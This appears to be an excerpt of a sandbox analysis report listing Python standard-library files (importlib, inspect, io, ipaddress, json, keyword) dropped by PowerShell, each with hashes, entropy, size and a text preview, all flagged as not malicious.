                                                                                                    Preview:import collections..import itertools..import pathlib..import operator..import zipfile....from . import abc....from ._itertools import only......def remove_duplicates(items):.. return iter(collections.OrderedDict.fromkeys(items))......class FileReader(abc.TraversableResources):.. def __init__(self, loader):.. self.path = pathlib.Path(loader.path).parent.... def resource_path(self, resource):.. """.. Return the file system path to prevent.. `resources.path()` from creating a temporary.. copy... """.. return str(self.path.joinpath(resource)).... def files(self):.. return self.path......class ZipReader(abc.TraversableResources):.. def __init__(self, loader, module):.. _, _, name = module.rpartition('.').. self.prefix = loader.prefix.replace('\\', '/') + name + '/'.. self.archive = loader.archive.... def open_resource(self, resource):.. try:.. return super().open_resource(resourc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2690
                                                                                                    Entropy (8bit):4.526701396390816
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:KGo0Zq8U4hoqG2w0Tkr00gq+FtN2PNShmUfHYmxd:KGo38FoudENgLQ8hN4mxd
                                                                                                    MD5:BAE9438D5F515335B7715B07087B1AD7
                                                                                                    SHA1:AAEBCBC814BC35F05231F20EC98058699C0304D5
                                                                                                    SHA-256:36D8A88A01A4A7166461A99F66A7F06E819B2938BC3057C73498FBC576082B81
                                                                                                    SHA-512:93C73E91E174BDF49C8ACEECCFDBF6C4A842BDB06E18A26C0998DF01212C81823463D0C0FC59DACAF3D27A946D1C186A002205B349F549905177BECAC33C57FE
                                                                                                    Malicious:false
                                                                                                    Preview:"""..Interface adapters for low-level readers..."""....import abc..import io..import itertools..from typing import BinaryIO, List....from .abc import Traversable, TraversableResources......class SimpleReader(abc.ABC):.. """.. The minimum, low-level interface required from a resource.. provider... """.... @property.. @abc.abstractmethod.. def package(self) -> str:.. """.. The name of the package for which this reader loads resources... """.... @abc.abstractmethod.. def children(self) -> List['SimpleReader']:.. """.. Obtain an iterable of SimpleReader for available.. child containers (e.g. directories)... """.... @abc.abstractmethod.. def resources(self) -> List[str]:.. """.. Obtain available named resources for this virtual package... """.... @abc.abstractmethod.. def open_binary(self, resource: str) -> BinaryIO:.. """.. Obtain a File-like for a named resource...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):368
                                                                                                    Entropy (8bit):4.7550177135351435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:INgUrW8U7FqMz/ZWJaM+zowdXLXzLW8igBCW7AYLtR6AoiDo18geK76Uy:Irmqs1zH5jnsi1EQDoPyp
                                                                                                    MD5:DD120D1EED86DDF996C749E9B17C696E
                                                                                                    SHA1:B640B9CAFEB9917AE67BA0EFE64FF6052A1C19A7
                                                                                                    SHA-256:EC15151F532D7E2E4740F0A9618481F3B37828C1180A9A86B7AE450117D67B51
                                                                                                    SHA-512:D6A49D1AF4B9119703715D5AC62F2417BE9FBDFCDB371B4A1C03F2A6194E80D1DF13739921EB1F1DDB41839510533F4CB737406197E2F6BCFFFC9ACCB1AEA30E
                                                                                                    Malicious:false
                                                                                                    Preview:"""..Compatibility shim for .resources.simple as found on Python 3.10.....Consumers that can rely on Python 3.11 should use the other..module directly..."""....from .resources.simple import (.. SimpleReader, ResourceHandle, ResourceContainer, TraversableReader,..)....__all__ = [.. 'SimpleReader', 'ResourceHandle', 'ResourceContainer', 'TraversableReader',..]..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11108
                                                                                                    Entropy (8bit):4.467337199704047
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ukRi99RbmAGewxmDwzxeaCs6KfYs+Fbve2+c6uNUS7GE7GHXonMbwq:uWi9DbmAGecmDwteQTft+9ee6uNUSdNc
                                                                                                    MD5:C3553B6F4BBCC833370B063D7E485994
                                                                                                    SHA1:B0FAB8A00A803AD7719215BDA1725A4100A17480
                                                                                                    SHA-256:D54717B02265B8807EC4241864A5008CF1F07FE44ED525B0A7E4830BDCB0177E
                                                                                                    SHA-512:91F02BD0EA770610ABD8A39B9C8E74B843896788122D5BF3C67D27EAAE785D0BE5E11D336303D4A4B8252C8B9B5AEFCB7E2D8B2500BC93BCB0790B89D8237C5C
                                                                                                    Malicious:false
                                                                                                    Preview:"""Utility code for constructing importers, etc."""..from ._abc import Loader..from ._bootstrap import module_from_spec..from ._bootstrap import _resolve_name..from ._bootstrap import spec_from_loader..from ._bootstrap import _find_spec..from ._bootstrap_external import MAGIC_NUMBER..from ._bootstrap_external import _RAW_MAGIC_NUMBER..from ._bootstrap_external import cache_from_source..from ._bootstrap_external import decode_source..from ._bootstrap_external import source_from_cache..from ._bootstrap_external import spec_from_file_location....import _imp..import sys..import threading..import types......def source_hash(source_bytes):.. "Return the hash of *source_bytes* as used in hash-based pyc files.".. return _imp.source_hash(_RAW_MAGIC_NUMBER, source_bytes)......def resolve_name(name, package):.. """Resolve a relative module name to an absolute one.""".. if not name.startswith('.'):.. return name.. elif not package:.. raise ImportError(f'no package speci
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128815
                                                                                                    Entropy (8bit):4.5450804886005605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Ysbp3kW3MOJ48WwycCMn+8R/E8iEcLBb5xaTqSsGjQdO69MR:/d3kW3Z48BycC6+i/3izb5EqpGjuOQMR
                                                                                                    MD5:4BF5163B840E062F42EED37E74E6D907
                                                                                                    SHA1:22722AE70EC807409A5FE7E9C55740E666035970
                                                                                                    SHA-256:2E53238C7F60ABF930DFBFD16C5969AFD0EDE52B74BF5ED74E87B2B12EA141C1
                                                                                                    SHA-512:2B96C12C7E72512A02C4854067D07955304BBBBE9C579A425280A0AEBEDE9B65DBF3F86D3BABC0B6B03124570F96C606AF1EAEC861A5371E40A1E34C1A54C7BE
                                                                                                    Malicious:false
                                                                                                    Preview:"""Get useful information from live Python objects.....This module encapsulates the interface provided by the internal special..attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion...It also provides some help for examining source code and class layout.....Here are some of the useful functions provided by this module:.... ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),.. isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),.. isroutine() - check object types.. getmembers() - get members of an object that satisfy a given condition.... getfile(), getsourcefile(), getsource() - find an object's source code.. getdoc(), getcomments() - get documentation on an object.. getmodule() - determine the module that an object came from.. getclasstree() - arrange classes so as to represent their hierarchy.... getargvalues(), getcallargs() - get info about function arguments.. getfullargspec() - same, with support for Pytho
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3681
                                                                                                    Entropy (8bit):4.9444373184330574
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:pKFiCaQLDyrpVfnmlaypyc4RQmvItakagjUgXgBagO:dCJDo/U9ycObojXQB9O
                                                                                                    MD5:AE864C768E16CE88666AFD08CD41A2FE
                                                                                                    SHA1:A33FB950B99FBAE349A29B476A7EF4FA7F2126E0
                                                                                                    SHA-256:D70646D9C063DD0AC4293591639DE75A100731D9F091F916FBCA4857CD8A044E
                                                                                                    SHA-512:A445ED5D76E0C8D1CD9EC8886CFDE873553C2A65BE164A9AA0B0340E78A0606819C841DE777A0654D4B96884E014FB8594129525AE7C0B5E7E1D1C2340B787D4
                                                                                                    Malicious:false
                                                                                                    Preview:"""The io module provides the Python interfaces to stream handling. The..builtin open function is defined in this module.....At the top of the I/O hierarchy is the abstract base class IOBase. It..defines the basic interface to a stream. Note, however, that there is no..separation between reading and writing to streams; implementations are..allowed to raise an OSError if they do not support a given operation.....Extending IOBase is RawIOBase which deals simply with the reading and..writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide..an interface to OS files.....BufferedIOBase deals with buffering on a raw byte stream (RawIOBase). Its..subclasses, BufferedWriter, BufferedReader, and BufferedRWPair buffer..streams that are readable, writable, and both respectively...BufferedRandom provides a buffered interface to random access..streams. BytesIO is a simple stream of in-memory bytes.....Another IOBase subclass, TextIOBase, deals with the encoding and decoding..of stre
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77311
                                                                                                    Entropy (8bit):4.543781477920564
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:gMOEpzoz5zCcf6ZQ8kSEtw1M1DGhkaCU7m7F7nKEwXN60wGUrnPpNBsB/FfhUQ3/:D3k92cfn8rB/3UrP2tF1zkm4uJPNjZT
                                                                                                    MD5:19019D4E4BBEE2096C35140714348B57
                                                                                                    SHA1:2AF2A0F877D9AA6FE8CDEF463716A21B6E088460
                                                                                                    SHA-256:4179279BF3A9711CC7A9C0E0679366113BAED44428807BE5A8F2C81B271F19B3
                                                                                                    SHA-512:2B2823EA8956F5154C4FC94166EB0C0A8A3E80C5102FE275907471D3104CFFF9430F08A4355E68E9CE0C54227595207E042639C6D61C65111ACEDB6A16656E1D
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright 2007 Google Inc...# Licensed to PSF under a Contributor Agreement....."""A fast, lightweight IPv4/IPv6 manipulation library in Python.....This library is used to create/poke/manipulate IPv4 and IPv6 addresses..and networks....."""....__version__ = '1.0'......import functools....IPV4LENGTH = 32..IPV6LENGTH = 128......class AddressValueError(ValueError):.. """A Value Error related to the address."""......class NetmaskValueError(ValueError):.. """A Value Error related to the netmask."""......def ip_address(address):.. """Take an IP string/int and return an object of the correct type..... Args:.. address: A string or integer, the IP address. Either IPv4 or.. IPv6 addresses may be supplied; integers less than 2**32 will.. be considered to be IPv4 by default..... Returns:.. An IPv4Address or IPv6Address object..... Raises:.. ValueError: if the *address* passed isn't either a v4 or a v6.. address.... """.. t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14379
                                                                                                    Entropy (8bit):4.879440125735685
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:yi/B/vYM/qFHkKzxUrZGabjtH0kSzxUrZGabuZbN92JDRCRtqUmnXRCRtqWAi2K5:yOIzxGwzxFxnWECxECdA
                                                                                                    MD5:DB4A220A79A5F826EF36359ED1C50C28
                                                                                                    SHA1:1774DC6339A61957AA38AB6A6A25AB6A0B1D9DE4
                                                                                                    SHA-256:FEB17670E443E5DB2723F217727DCC5D5E155C40E4E6935B16061C88542F24E7
                                                                                                    SHA-512:3A51E599669D4AFC7339EF06C7A3C9889718EE525F019F044672F2A1C7DE6BF98F581AF54B138D0573D2CC9CF660DDBDF81DB9C4516A125F49BE4A147F2F09B6
                                                                                                    Malicious:false
                                                                                                    Preview:r"""JSON (JavaScript Object Notation) <https://json.org> is a subset of..JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data..interchange format.....:mod:`json` exposes an API familiar to users of the standard library..:mod:`marshal` and :mod:`pickle` modules. It is derived from a..version of the externally maintained simplejson library.....Encoding basic Python object hierarchies::.... >>> import json.. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]).. '["foo", {"bar": ["baz", null, 1.0, 2]}]'.. >>> print(json.dumps("\"foo\bar")).. "\"foo\bar".. >>> print(json.dumps('\u1234')).. "\u1234".. >>> print(json.dumps('\\')).. "\\".. >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)).. {"a": 0, "b": 0, "c": 0}.. >>> from io import StringIO.. >>> io = StringIO().. >>> json.dump(['streaming API'], io).. >>> io.getvalue().. '["streaming API"]'....Compact encoding::.... >>> import json.. >>> mydict = {'4':
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13659
                                                                                                    Entropy (8bit):5.582584498279117
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:vM0TNAHo6vx/YvM3vx8ZvWzZrk3Zr/WAA:U0pAHfvx/YvWvx8ZvWZrk3Zr/WAA
                                                                                                    MD5:78BA0BA33865A1627B8BCAAA25ED1AA0
                                                                                                    SHA1:2E68D25261B2F03F417375E6DD67A8C8CA150557
                                                                                                    SHA-256:FF92E03029093303BFFEA725612F1D07959A74A048E0B33AA6BAD468B2162843
                                                                                                    SHA-512:BACE53E2561D50D24DDFE0557507B1A5F07EE46DB95F57AD0827C04D07B575C544B46566AC19DE7C91384F290D0E06BEE42D0CD09D17867E06744AB374EA8D01
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f+8..............................d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z...e.d.d.d.d.d.d.d...........Z.d.d.d.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d.d.d.d...d...Z...e.d.d...........Z.d...Z.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d...d...Z.y.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13864
                                                                                                    Entropy (8bit):5.744352903898608
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:POyvB6kdGEZLu6A94DMUu5v7vLobKWjFZ3iIgXgw4F8mbANHFThJt7AeIM+JSlRJ:2Vk0Mi6A94DMUu5v7vPokR28muInJ8RJ
                                                                                                    MD5:59304DA7C224BA5424BC13B03B9A47FD
                                                                                                    SHA1:7F542BBAFFF66723485C9E2B7523A4C9EC0BCA73
                                                                                                    SHA-256:0F216B180EA8CC41A9EA324A0FDF5D4A5253D02DD61D7F5AB9D6F955DAFCC17B
                                                                                                    SHA-512:C0BCFE014556A927602D27C55A4BFBFF607FD225BF94ED46F4A0377A6AED0985D87252827F25F81C7697F840E0685E8A4F604AB9199CC8CD9B95BCCBF9ABBCE9
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.2..............................d.Z.d.d.l.Z.d.d.l.m.Z.....d.d.l.m.Z...d.d.g.Z.e.j...................e.j...................z...e.j...................z...Z...e.d.........Z...e.d.........Z...e.d.........Z...G.d...d.e.........Z.e.e.e.d...Z...e.j(..................d.e.........Z.d.d.d.d.d.d.d.d.d...Z.d...Z.d.e.e.j0..................f.d...Z.e.x.s...e.Z...e.j(..................d.e.........Z.d.Z.d.e.j0..................e.f.d...Z.e.j0..................e.f.d...Z...G.d...d.e.........Z.y.#.e.$.r...d.Z.Y...w.x.Y.w.).z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc...........................e.Z.d.Z.d.Z.d...Z.d...Z.y.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15137
                                                                                                    Entropy (8bit):5.805452410651969
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:gZ3up4Kkgf4MszI6lxnP14EZN7/JG2NQHbqzY4vyyK5wEnLZ6rtbvvs:T4XMUnd4EZG2q2uHKELZ6xjs
                                                                                                    MD5:6460EB1EF06BC83CEAE802345DB2CB10
                                                                                                    SHA1:11AED0D9E885DBEA78787DFDAC0E3CC58859BF46
                                                                                                    SHA-256:F8700E1F14A861F9EF5A972A3BE59E2A75AF6CC86B9FA3540296728586B2BA72
                                                                                                    SHA-512:3893B7289A94676E49B651DBB6B8BE9C76459D29F46CFCA9BFDD7C4EE954946B60775446EDD3DDC545D30B2622E1DF96B66AF68CCE4144992E2BC580F295D352
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.@..............................d.Z.d.d.l.Z...d.d.l.m.Z.....d.d.l.m.Z.....d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z.d.d.d.d.d.d.d.d...Z...e.d.........D.])..Z.e.j#....................e.e.........d.j'..................e....................+..[...e.d.........Z.d...Z.e.x.s...e.Z.d...Z.e.x.s...e.Z...G.d...d.e.........Z.e.e.e.e.e.e.e.e e!e.jD..................f.d...Z#y.#.e.$.r...d.Z.Y...w.x.Y.w.#.e.$.r...d.Z.Y...w.x.Y.w.#.e.$.r...d.Z.Y...w.x.Y.w.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc.....................@.....d...}.d.t.........j...................|.|.........z...d.z...S.).z5Return a JSON representation of a Python string.. c.....................2.....t.........|.j...................d.............S.).Nr....)...ES
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3360
                                                                                                    Entropy (8bit):5.709002022644626
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:lt6DpunJrjjyo3RUSdoUGusv3yhE0vSFUhIE0MxBgZ9OU6ISSgGcceRl8L2dV4Jy:eu1jyoB+PJEz6Z9OU6ISPBR/dV4J0X
                                                                                                    MD5:0CF15190EAD78CEAC3AB9BF18381596F
                                                                                                    SHA1:88235BF7F9B31FB781BFF45109C4B35B9F51D190
                                                                                                    SHA-256:5A5BD5224AD25FDAD5ADC2EE01119E587BCBDA55F5AD39E4053C5061F2AB9663
                                                                                                    SHA-512:F2AB8D873BBD38444ADD520970613CC699FB9EC6BE682513498AD2E3384497B88EA33964E01C97A274569E4569F2CC7AFBF97006F9946418931A9A648E5FE5BF
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f...............................d.Z.d.d.l.Z...d.d.l.m.Z...d.g.Z...e.j...................d.e.j...................e.j...................z...e.j...................z...........Z.d...Z.e.x.s...e.Z.y.#.e.$.r...d.Z.Y..Mw.x.Y.w.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c.....................Z.............................|.j.....................|.j.....................|.j.....................t.........j.....................|.j.....................|.j.....................|.j.....................|.j.....................|.j.....................|.j.....................|.j.............................................f.d.........f.d...}.|.S.).Nc..............................|.|.....}.|.d.k(..r.....|.|.d.z.............S.|.d.k(..r.....|.|.d.z...f...................S.|.d.k(..r.....|.|.d.z...f...........S.|.d.k(..r.|.|.|.d.z.....d.k(..r.d.|.d.z...f.S.|.d.k(..r.|.|.|.d.z.....d.k(..r.d.|.d.z...f.S.|.d.k(..r.|.|.|.d.z.....d.k(..r.d.|.d.z...f.S.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12829
                                                                                                    Entropy (8bit):4.602150515729369
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4LZ5A9dcw1No306qcRvU23OHh7MSUBzBru3Gc5kaXQxzfv4YAimanhXYAxisbPK:4Z5AZq30Nuv4WDK
                                                                                                    MD5:5CCA52D21FDD03EBC838040B3B3448A0
                                                                                                    SHA1:26EA25AB90B1D325AE65D492944E3757C0A1A4D6
                                                                                                    SHA-256:B719FBCFCEBD2B174F076E71292E22B1A17D9E258DBE896C768325383BAD4F80
                                                                                                    SHA-512:E21F1F5EF9821DC49A71552D8E3E42DB1D1817A9567C10AEA7764B3143630105570BCBF41A63AEE58B65ED7AC13C77AFC2A16CB46DC236F3529A95D755150D66
                                                                                                    Malicious:false
                                                                                                    Preview:"""Implementation of JSONDecoder.."""..import re....from json import scanner..try:.. from _json import scanstring as c_scanstring..except ImportError:.. c_scanstring = None....__all__ = ['JSONDecoder', 'JSONDecodeError']....FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL....NaN = float('nan')..PosInf = float('inf')..NegInf = float('-inf')......class JSONDecodeError(ValueError):.. """Subclass of ValueError with the following additional properties:.... msg: The unformatted error message.. doc: The JSON document being parsed.. pos: The start index of doc where parsing failed.. lineno: The line corresponding to pos.. colno: The column corresponding to pos.... """.. # Note that this exception is used from _json.. def __init__(self, msg, doc, pos):.. lineno = doc.count('\n', 0, pos) + 1.. colno = pos - doc.rfind('\n', 0, pos).. errmsg = '%s: line %d column %d (char %d)' % (msg, lineno, colno, pos).. ValueError.__init__(self, errmsg).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16513
                                                                                                    Entropy (8bit):4.335956405004206
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zLMkYik8W5R700myuumc/Wif3vwPQj+xSgy3vYJ54Ivj+xSvxCJ2sa:DYR5R7JmyuumKf/pj+xSgy/8Nj+xSvQU
                                                                                                    MD5:B7B017A5F7AEC54D3743196D491F0CC9
                                                                                                    SHA1:8F117C230F7DF5EAEE396A6EB854117442CD64E8
                                                                                                    SHA-256:7DB65C95F09297D57CC6273D78858B25FFCBA65BC83709C4A15584D1DBEF3C38
                                                                                                    SHA-512:BAFDFDD9C4F652CF3DF4434F06E1F915DA6126F1A81E7C39CC28528C4E74364FA0327741AB8D073F61E955133BBBEFB631C4D4B2A6D79B3911CF689187B56A2B
                                                                                                    Malicious:false
                                                                                                    Preview:"""Implementation of JSONEncoder.."""..import re....try:.. from _json import encode_basestring_ascii as c_encode_basestring_ascii..except ImportError:.. c_encode_basestring_ascii = None..try:.. from _json import encode_basestring as c_encode_basestring..except ImportError:.. c_encode_basestring = None..try:.. from _json import make_encoder as c_make_encoder..except ImportError:.. c_make_encoder = None....ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')..ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')..HAS_UTF8 = re.compile(b'[\x80-\xff]')..ESCAPE_DCT = {.. '\\': '\\\\',.. '"': '\\"',.. '\b': '\\b',.. '\f': '\\f',.. '\n': '\\n',.. '\r': '\\r',.. '\t': '\\t',..}..for i in range(0x20):.. ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i)).. #ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))..del i....INFINITY = float('inf')....def py_encode_basestring(s):.. """Return a JSON representation of a Python string.... """.. def replace(match):.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2498
                                                                                                    Entropy (8bit):4.554490171873137
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:krFYUtdVRojq1j1op2sy5zRwDvAvsCYSl2SOsyV9P:krFJGjcjepJy5zRvkCYSl2SOsyV9P
                                                                                                    MD5:83EDC258CA5D89378BC86FE790CBF1B7
                                                                                                    SHA1:618A95730FC4AD64ADA9BA39F155B6A873D0447F
                                                                                                    SHA-256:9841566FB17315EBDD40A1CA9CB214F02CDE7171B187D4DC821C80120EA853C3
                                                                                                    SHA-512:932029300DB3D377BAA4B8003ACB2B76D7F757C02F067B035F4A248A8D2C1FF8E34CB7BBC4E332D354A3ACEF01A4905349F291F7E66774D1F557BA6126A0A225
                                                                                                    Malicious:false
                                                                                                    Preview:"""JSON token scanner.."""..import re..try:.. from _json import make_scanner as c_make_scanner..except ImportError:.. c_make_scanner = None....__all__ = ['make_scanner']....NUMBER_RE = re.compile(.. r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',.. (re.VERBOSE | re.MULTILINE | re.DOTALL))....def py_make_scanner(context):.. parse_object = context.parse_object.. parse_array = context.parse_array.. parse_string = context.parse_string.. match_number = NUMBER_RE.match.. strict = context.strict.. parse_float = context.parse_float.. parse_int = context.parse_int.. parse_constant = context.parse_constant.. object_hook = context.object_hook.. object_pairs_hook = context.object_pairs_hook.. memo = context.memo.... def _scan_once(string, idx):.. try:.. nextchar = string[idx].. except IndexError:.. raise StopIteration(idx) from None.... if nextchar == '"':.. return parse_string(string, idx + 1, stri
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3424
                                                                                                    Entropy (8bit):4.383060644777333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:pPza+AFS0/LZ3DmLU9k+3W7P/BopadkHqdyf6yAp7zKaz:pP8Fp/F3EU9kV8adkHBf2Is
                                                                                                    MD5:04BB41005A34A0439354779391919F36
                                                                                                    SHA1:3878CE551869C7CD7A9801CC7E1533D758D73F7D
                                                                                                    SHA-256:E4940A58DC30B05A4D66ABCE80C8FF52712BD9EAAAAF50B526ECCB49185950D6
                                                                                                    SHA-512:E5ACA0CE7E46F86F678464E2C1AEEDD2B3BC86C98323B362FF02235DC69295001E0B6F7978754A0917AA4640808CB2656FFC64CCA179E88378AE85F2A0E34CD6
                                                                                                    Malicious:false
                                                                                                    Preview:r"""Command-line tool to validate and pretty-print JSON....Usage::.... $ echo '{"json":"obj"}' | python -m json.tool.. {.. "json": "obj".. }.. $ echo '{ 1.2:3.4}' | python -m json.tool.. Expecting property name enclosed in double quotes: line 1 column 3 (char 2)...."""..import argparse..import json..import sys..from pathlib import Path......def main():.. prog = 'python -m json.tool'.. description = ('A simple command line interface for json module '.. 'to validate and pretty-print JSON objects.').. parser = argparse.ArgumentParser(prog=prog, description=description).. parser.add_argument('infile', nargs='?',.. type=argparse.FileType(encoding="utf-8"),.. help='a JSON file to be validated or pretty-printed',.. default=sys.stdin).. parser.add_argument('outfile', nargs='?',.. type=Path,.. help='write the output of infile t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1137
                                                                                                    Entropy (8bit):4.579459752924743
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1TuAvF8VVC7Ln46q7a/cl6b93h0qkc7mKeWdItSw+9cCe5:1K88VVV8c0qqp7mKk
                                                                                                    MD5:A10DF1136C08A480EF1D2B39A1F48E4A
                                                                                                    SHA1:FC32A1FF5DA1DB4755ECFAE82AA23DEF659BEB13
                                                                                                    SHA-256:1F28F509383273238AD86EDA04A96343FA0DC10EEAF3189439959D75CDAC0A0B
                                                                                                    SHA-512:603F6DC4556CBBD283CF77233727E269C73C6E1B528084E6C6234AEFD538313B4ACC67CA70A7DB03E015A30F817FCFEDDA2B73DE480963AE0EEFD486F87463CD
                                                                                                    Malicious:false
                                                                                                    Preview:"""Keywords (from "Grammar/python.gram")....This file is automatically generated; please don't muck it up!....To update the symbols in this file, 'cd' to the top directory of..the python source tree and run:.... PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen \.. Grammar/python.gram \.. Grammar/Tokens \.. Lib/keyword.py....Alternatively, you can run 'make regen-keyword'..."""....__all__ = ["iskeyword", "issoftkeyword", "kwlist", "softkwlist"]....kwlist = [.. 'False',.. 'None',.. 'True',.. 'and',.. 'as',.. 'assert',.. 'async',.. 'await',.. 'break',.. 'class',.. 'continue',.. 'def',.. 'del',.. 'elif',.. 'else',.. 'except',.. 'finally',.. 'for',.. 'from',.. 'global',.. 'if',.. 'import',.. 'in',.. 'is',.. 'lambda',.. 'nonlocal',.. 'not',.. 'or',.. 'pass',.. 'raise',.. 'return',.. 'try',.. 'while',.. 'with',.. 'yield'..]....softkwlist = [.. '_',..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):164
                                                                                                    Entropy (8bit):4.6032245222614945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JSLXLoowvovGVmLjMFuKMJX42FiMxKRiFEK/W/yWLUkpCcoG+LM2JOOlWUov:wXLory8mcF7MZ42FiiKE+K/JMP4a41Wp
                                                                                                    MD5:ECAE53227C25F2C67FFA03744FFE68A5
                                                                                                    SHA1:123CF7A81CF99DEE84E18CFBD38B8B100FA40C0D
                                                                                                    SHA-256:1FA8D7B8D7222C3CE492F9A17AE2D37FE9C9815DDC757E6220F2018CF8058DE4
